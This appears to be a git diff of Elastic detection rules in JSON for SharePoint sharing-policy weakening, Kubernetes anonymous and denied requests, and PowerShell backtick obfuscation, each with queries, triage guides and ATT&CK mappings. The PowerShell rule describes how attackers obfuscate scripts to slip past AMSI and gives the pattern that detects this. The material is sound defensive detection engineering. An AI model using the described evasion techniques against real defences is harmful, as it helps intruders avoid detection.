Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - }, - { - "id": "T1204", - "name": "User Execution", - "reference": "https://attack.mitre.org/techniques/T1204/", - "subtechnique": [ - { - "id": "T1204.002", - "name": "Malicious File", - "reference": "https://attack.mitre.org/techniques/T1204/002/" - } - ] - } - ] 
- } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 3 - }, - "id": "5bdad1d5-5001-4a13-ae99-fa8619500f1a_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/632906c6-ba8f-44c0-8386-ec0bbc8518bf_1.json b/packages/security_detection_engine/kibana/security_rule/632906c6-ba8f-44c0-8386-ec0bbc8518bf_1.json new file mode 100644 index 00000000000..b8056f7a1e7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/632906c6-ba8f-44c0-8386-ec0bbc8518bf_1.json 
@@ -0,0 +1,158 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed. This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths.", + "false_positives": [ + "Administrators legitimately enabling external sharing for a new collaboration site or project.", + "Organizational policy changes that intentionally broaden sharing capabilities across sites.", + "Migration or onboarding projects that temporarily require external sharing to be enabled." + ], + "from": "now-9m", + "index": [ + "filebeat-*", + "logs-o365.audit-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "M365 SharePoint Site Sharing Policy Weakened", + "note": "## Triage and Analysis\n\n### Investigating M365 SharePoint Site Sharing Policy Weakened\n\nThis rule detects when SharePoint or OneDrive sharing policies are modified to weaken security controls. The `SharingPolicyChanged` event captures modifications to site-level sharing settings stored in `ModifiedProperties`, where the setting name is a dynamic field key and `OldValue`/`NewValue` track the transition. This rule targets specific transitions that represent a security posture degradation. 
Note that Microsoft uses inconsistent keyword value formats across settings, some use `True`/`False` while others use `Enabled`/`Disabled`.\n\n#### Possible Investigation Steps\n\n- Identify the user who performed the change via `user.id` and determine if they have a legitimate administrative role.\n- Check if the acting user is a service principal (e.g., `ServiceOperator`, `app@sharepoint`) or a human account. Service principal changes may indicate automated processes or compromised application credentials.\n- Review which specific setting was changed by examining the `o365.audit.ModifiedProperties.*` fields:\n - ShareWithGuests: Guest/external sharing was enabled on the site. External users can now be invited to access content.\n - ShareUsingAnonymousLinks: Anonymous \"Anyone\" link sharing was enabled. Content can now be shared via unauthenticated links.\n - IsPublic: The site or group was changed from private to public visibility.\n - AllowGuestUser: Guest user access was enabled for the site.\n - AllowFederatedUsers: Federated (external organization) user access was enabled.\n - AllowTeamsConsumer: Teams personal account (consumer) user access was enabled.\n- Identify the affected site via `o365.audit.ObjectId` (the site URL) and assess the sensitivity of its content.\n- Review Azure AD / Entra ID sign-in logs for the acting account to check for authentication anomalies (unusual location, device code flow, new device).\n- Look for subsequent sharing activity on the same site \u2014 `SharingSet`, `AnonymousLinkCreated`, `SharingInvitationCreated`, or file download events shortly after the policy change.\n- Determine if the change was part of a planned change request or occurred outside of normal change windows.\n\n### False Positive Analysis\n\n- IT administrators enabling external sharing for legitimate collaboration needs. 
Correlate with change management tickets or Slack/Teams messages.\n- Automated provisioning scripts that configure sharing settings during site creation. These typically use service principal accounts with predictable patterns.\n- Microsoft service operations (`ServiceOperator`) may modify settings as part of tenant-level policy propagation.\n\n### Response and Remediation\n\n- If the change is unauthorized, immediately revert the sharing policy to its previous restrictive state.\n- Revoke sessions and reset credentials for the compromised account.\n- Review what content was accessed or shared after the policy change using `FileAccessed`, `FileDownloaded`, and sharing audit events.\n- Audit all sites for similar unauthorized sharing policy changes.\n- Implement Conditional Access policies to restrict administrative actions to trusted networks and compliant devices.\n- Enable Privileged Identity Management (PIM) for SharePoint administrator roles to enforce just-in-time access.\n", + "query": "event.dataset: \"o365.audit\" and event.provider: (\"SharePoint\" or \"OneDrive\") and\n event.action: \"SharingPolicyChanged\" and event.outcome: \"success\" and\n (\n (o365.audit.ModifiedProperties.ShareWithGuests.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.ShareWithGuests.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.IsPublic.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.IsPublic.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.AllowGuestUser.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.AllowGuestUser.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.AllowFederatedUsers.NewValue: (true or \"Enabled\") and\n 
o365.audit.ModifiedProperties.AllowFederatedUsers.OldValue: (false or \"Disabled\"))\n or\n (o365.audit.ModifiedProperties.AllowTeamsConsumer.NewValue: (true or \"Enabled\") and\n o365.audit.ModifiedProperties.AllowTeamsConsumer.OldValue: (false or \"Disabled\"))\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/purview/audit-log-activities#site-administration-activities", + "https://learn.microsoft.com/en-us/purview/audit-log-sharing", + "https://learn.microsoft.com/en-us/sharepoint/turn-external-sharing-on-or-off" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowFederatedUsers.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowFederatedUsers.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowGuestUser.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowGuestUser.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowTeamsConsumer.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.AllowTeamsConsumer.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.IsPublic.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.IsPublic.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": 
"o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.OldValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.ShareWithGuests.NewValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.ShareWithGuests.OldValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "632906c6-ba8f-44c0-8386-ec0bbc8518bf", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "632906c6-ba8f-44c0-8386-ec0bbc8518bf_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_8.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_8.json deleted file mode 100644 index 3d36a19e602..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_8.json +++ /dev/null 
@@ -1,77 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a service account makes an unauthorized request for resources from the API server. Service accounts follow a very predictable pattern of behavior. A service account should never send an unauthorized request to the API server. This behavior is likely an indicator of compromise or of a problem within the cluster. An adversary may have gained access to credentials/tokens and this could be an attempt to access or create resources to facilitate further movement or execution within the cluster.", - "false_positives": [ - "Unauthorized requests from service accounts are highly abnormal and more indicative of human behavior or a serious problem within the cluster. This behavior should be investigated further." - ], - "index": [ - "logs-kubernetes.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Denied Service Account Request", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Denied Service Account Request\n\nKubernetes service accounts are integral for managing pod permissions and accessing the API server. They typically follow strict access patterns. Adversaries may exploit compromised service account credentials to probe or manipulate cluster resources, potentially leading to unauthorized access or lateral movement. 
The detection rule identifies anomalies by flagging unauthorized API requests from service accounts, signaling possible security breaches or misconfigurations.\n\n### Possible investigation steps\n\n- Review the specific service account involved in the unauthorized request by examining the kubernetes.audit.user.username field to determine which service account was used.\n- Analyze the kubernetes.audit.annotations.authorization_k8s_io/decision field to confirm the request was indeed forbidden and identify the nature of the denied request.\n- Investigate the source of the request by checking the originating pod or node to understand where the unauthorized request was initiated.\n- Examine recent activity logs for the service account to identify any unusual patterns or deviations from its typical behavior.\n- Check for any recent changes or deployments in the cluster that might have affected service account permissions or configurations.\n- Assess whether there have been any recent security incidents or alerts related to the cluster that could be connected to this unauthorized request.\n\n### False positive analysis\n\n- Service accounts used for testing or development may generate unauthorized requests if they are not properly configured. Regularly review and update permissions for these accounts to ensure they align with their intended use.\n- Automated scripts or tools that interact with the Kubernetes API might trigger false positives if they use service accounts with insufficient permissions. Ensure these tools have the necessary permissions or adjust the detection rule to exclude known benign activities.\n- Misconfigured role-based access control (RBAC) settings can lead to legitimate service accounts being denied access. Conduct periodic audits of RBAC policies to verify that service accounts have appropriate permissions.\n- Temporary service accounts created for specific tasks might not have the correct permissions, leading to denied requests. 
Consider excluding these accounts from the rule if they are known to perform non-threatening activities.\n- Service accounts from third-party integrations or plugins may not have the required permissions, resulting in false positives. Validate the permissions needed for these integrations and adjust the rule to exclude their expected behavior.\n\n### Response and remediation\n\n- Immediately isolate the affected service account by revoking its access tokens and credentials to prevent further unauthorized API requests.\n- Conduct a thorough review of the audit logs to identify any other suspicious activities or unauthorized access attempts associated with the compromised service account.\n- Rotate credentials for the affected service account and any other potentially impacted accounts to mitigate the risk of further exploitation.\n- Assess and remediate any misconfigurations in role-based access control (RBAC) policies that may have allowed the unauthorized request, ensuring that service accounts have the minimum necessary permissions.\n- Escalate the incident to the security operations team for further investigation and to determine if additional containment measures are required.\n- Implement enhanced monitoring and alerting for similar unauthorized access attempts to improve detection and response times for future incidents.\n- Review and update incident response plans to incorporate lessons learned from this event, ensuring readiness for similar threats in the future.", - "query": "event.dataset: \"kubernetes.audit_logs\"\n and kubernetes.audit.user.username: system\\:serviceaccount\\:*\n and kubernetes.audit.annotations.authorization_k8s_io/decision: \"forbid\"\n", - "references": [ - "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", - "https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens" - ], - "related_integrations": [ - { - "package": "kubernetes", 
- "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.user.username", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "63c056a0-339a-11ed-a261-0242ac120002", - "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Discovery", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1613", - "name": "Container and Resource Discovery", - "reference": "https://attack.mitre.org/techniques/T1613/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 8 - }, - "id": "63c056a0-339a-11ed-a261-0242ac120002_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_9.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_9.json deleted file mode 100644 index 597d171b777..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_9.json +++ /dev/null 
@@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when an unauthenticated user request is authorized within the cluster. Attackers may attempt to use anonymous accounts to gain initial access to the cluster or to avoid attribution of their activities within the cluster. This rule excludes the /healthz, /livez and /readyz endpoints which are commonly accessed anonymously.", - "false_positives": [ - "Anonymous access to the API server is a dangerous setting enabled by default. Common anonymous connections (e.g., health checks) have been excluded from this rule. All other instances of authorized anonymous requests should be investigated." - ], - "index": [ - "logs-kubernetes.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Anonymous Request Authorized", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Anonymous Request Authorized\n\nKubernetes, a container orchestration platform, manages workloads and services. It uses authentication to control access. Adversaries might exploit anonymous access to perform unauthorized actions without leaving traces. 
The detection rule identifies unauthorized access by monitoring audit logs for anonymous requests that are allowed, excluding common health check endpoints, to flag potential misuse.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.dataset:kubernetes.audit_logs to identify the context and details of the anonymous request.\n- Examine the kubernetes.audit.user.username field to confirm if the request was made by \"system:anonymous\" or \"system:unauthenticated\" and assess the potential risk associated with these accounts.\n- Analyze the kubernetes.audit.requestURI to determine the target of the request and verify if it is outside the excluded endpoints (/healthz, /livez, /readyz), which could indicate suspicious activity.\n- Investigate the source IP address and other network metadata associated with the request to identify the origin and assess if it aligns with known or expected traffic patterns.\n- Check for any subsequent or related activities in the audit logs that might indicate further unauthorized actions or attempts to exploit the cluster.\n\n### False positive analysis\n\n- Health check endpoints like /healthz, /livez, and /readyz are already excluded, but ensure any custom health check endpoints are also excluded to prevent false positives.\n- Regularly scheduled maintenance tasks or automated scripts that use anonymous access for legitimate purposes should be identified and excluded from the rule to avoid unnecessary alerts.\n- Some monitoring tools might use anonymous requests for gathering metrics; verify these tools and exclude their specific request patterns if they are known to be safe.\n- Development environments might have different access patterns compared to production; consider creating separate rules or exceptions for non-production clusters to reduce noise.\n- Review the audit logs to identify any recurring anonymous requests that are part of normal operations and adjust the rule to exclude these specific 
cases.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes cluster to prevent further unauthorized access and potential lateral movement by the adversary.\n- Revoke any anonymous access permissions that are not explicitly required for the operation of the cluster, ensuring that all access is authenticated and authorized.\n- Conduct a thorough review of the audit logs to identify any unauthorized actions performed by anonymous users and assess the impact on the cluster.\n- Reset credentials and access tokens for any accounts that may have been compromised or used in conjunction with the anonymous access.\n- Implement network segmentation to limit the exposure of the Kubernetes API server to only trusted networks and users.\n- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or systems are affected.\n- Enhance monitoring and alerting for unauthorized access attempts, focusing on detecting and responding to similar threats in the future.", - "query": "event.dataset:kubernetes.audit_logs\n and kubernetes.audit.annotations.authorization_k8s_io/decision:allow\n and kubernetes.audit.user.username:(\"system:anonymous\" or \"system:unauthenticated\" or not *)\n and not kubernetes.audit.requestURI:(/healthz* or /livez* or /readyz*)\n", - "references": [ - "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF" - ], - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.requestURI", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.user.username", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": 
"63c057cc-339a-11ed-a261-0242ac120002", - "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Execution", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.001", - "name": "Default Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 9 - }, - "id": "63c057cc-339a-11ed-a261-0242ac120002_9", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_8.json b/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_8.json deleted file mode 100644 index 25f7c270678..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_8.json +++ /dev/null 
@@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use invalid escape sequences as a form of obfuscation. This technique introduces backticks (`) between characters in a way that does not correspond to valid PowerShell escape sequences, breaking up strings and bypassing pattern-based detections while preserving execution logic. This is designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Invalid Escape Sequences", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Invalid Escape Sequences\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques to evade detection. By inserting invalid escape sequences, attackers can obscure malicious scripts, bypassing static analysis and security tools like AMSI. The detection rule identifies such obfuscation by analyzing script patterns, specifically targeting unusual backtick usage, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the context and content of the script block that triggered the alert. Look for patterns of invalid escape sequences and assess whether they appear intentionally obfuscated.\n- Examine the `file.name` and `file.path` fields to determine the origin and location of the script. 
This can help identify whether the script is part of a legitimate application or potentially malicious.\n- Check the `host.name` and `agent.id` fields to identify the affected system and the agent responsible for logging the event. This information is crucial for understanding the scope of the potential threat.\n- Analyze the `user.id` field to ascertain which user executed the script. This can provide insights into whether the user has a history of executing suspicious scripts or if their account may be compromised.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution sequence and correlate it with other related script blocks, which may reveal additional obfuscation or malicious activity.\n- Assess the `count` field to evaluate the extent of obfuscation detected. A higher count may indicate more aggressive obfuscation techniques, warranting further scrutiny.\n\n### False positive analysis\n\n- Scripts from Visual Studio Code's PowerShell extension may trigger false positives due to its shell integration. To handle this, exclude scripts containing the pattern \"$([char]0x1b)]633\" from detection.\n- PowerShell modules with names starting with \"TSS_\" may be flagged incorrectly. Exclude these by adding a condition to ignore files matching the pattern \"TSS_*.psm1\".\n- Legitimate scripts that use backticks for formatting or other non-obfuscation purposes might be detected. Review such scripts and, if verified as safe, add them to an exception list based on their script block ID or file path.\n- Regularly update the exclusion list to reflect changes in legitimate script usage patterns, ensuring that new false positives are addressed promptly.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent lateral movement and further execution of potentially malicious scripts. 
Disconnect the host from the network and disable remote access.\n\n- Analyze the script block text and file path to identify the source and nature of the obfuscated script. Determine if the script is part of a larger attack or if other systems are affected.\n\n- Remove or quarantine the identified malicious script and any associated files from the host. Ensure that all remnants of the obfuscated code are eliminated to prevent re-execution.\n\n- Conduct a thorough scan of the host using updated antivirus and antimalware tools to detect and remove any additional threats or indicators of compromise.\n\n- Review and update PowerShell execution policies and security settings to restrict the execution of scripts with invalid escape sequences. Implement stricter controls to prevent similar obfuscation techniques.\n\n- Escalate the incident to the security operations center (SOC) or relevant cybersecurity team for further investigation and monitoring. Provide detailed logs and findings to assist in understanding the scope and impact of the threat.\n\n- Implement enhanced logging and monitoring for PowerShell activities across the network to detect and respond to similar obfuscation attempts promptly. 
Use the identified patterns to refine detection capabilities.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*`*\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[A-Za-z0-9_-]`(?![rntb]|\\r|\\n|\\d)[A-Za-z0-9_-]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.name,\n file.directory,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least 20 times\n| where Esql.script_block_pattern_count >= 20\n\n| where file.name not like \"TSS_*.psm1\"\n // ESQL requires this condition, otherwise it only returns matches where file.name exists.\n or file.name is null\n\n// VSCode Shell integration\n| where not powershell.file.script_block_text like \"*$([char]0x1b)]633*\"\n\n| where not file.directory == \"C:\\\\Program Files\\\\MVPSI\\\\JAMS\\\\Agent\\\\Temp\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - 
"ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "64f17c52-6c6e-479e-ba72-236f3df18f3d", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add 
\"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 8 - }, - "id": "64f17c52-6c6e-479e-ba72-236f3df18f3d_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_127.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_127.json new file mode 100644 index 00000000000..2fea0f06522 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_127.json 
